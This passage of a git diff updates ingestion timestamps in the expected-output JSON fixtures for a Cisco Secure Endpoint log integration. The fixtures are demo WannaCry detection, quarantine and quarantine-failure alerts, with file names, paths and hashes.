Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -4856,7 +4856,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010927600Z", + "ingested": "2021-12-14T14:40:52.874159315Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -4942,7 +4942,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010931700Z", + "ingested": "2021-12-14T14:40:52.874159662Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782271\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -5028,7 +5028,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010936Z", + "ingested": "2021-12-14T14:40:52.874160012Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782270\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -5102,7 +5102,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010940500Z", + "ingested": "2021-12-14T14:40:52.874160371Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json index 84d6a848011..a1c679f2888 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json @@ -28,7 +28,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461437500Z", + "ingested": "2021-12-14T14:40:57.457036813Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -104,7 +104,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461446400Z", + "ingested": "2021-12-14T14:40:57.457040209Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -180,7 +180,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461470300Z", + "ingested": "2021-12-14T14:40:57.457040789Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -256,7 +256,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461478400Z", + "ingested": "2021-12-14T14:40:57.457041158Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -332,7 +332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461482400Z", + "ingested": "2021-12-14T14:40:57.457041577Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -408,7 +408,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461487300Z", + "ingested": "2021-12-14T14:40:57.457041940Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -496,7 +496,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461493200Z", + "ingested": "2021-12-14T14:40:57.457042317Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -593,7 +593,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461499200Z", + "ingested": "2021-12-14T14:40:57.457042971Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", @@ -683,7 +683,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461503100Z", + "ingested": "2021-12-14T14:40:57.457043333Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -769,7 +769,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461507100Z", + "ingested": "2021-12-14T14:40:57.457043804Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -843,7 +843,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461510700Z", + "ingested": "2021-12-14T14:40:57.457044162Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -915,7 +915,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461515400Z", + "ingested": "2021-12-14T14:40:57.457044755Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -987,7 +987,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461521100Z", + "ingested": "2021-12-14T14:40:57.457045123Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 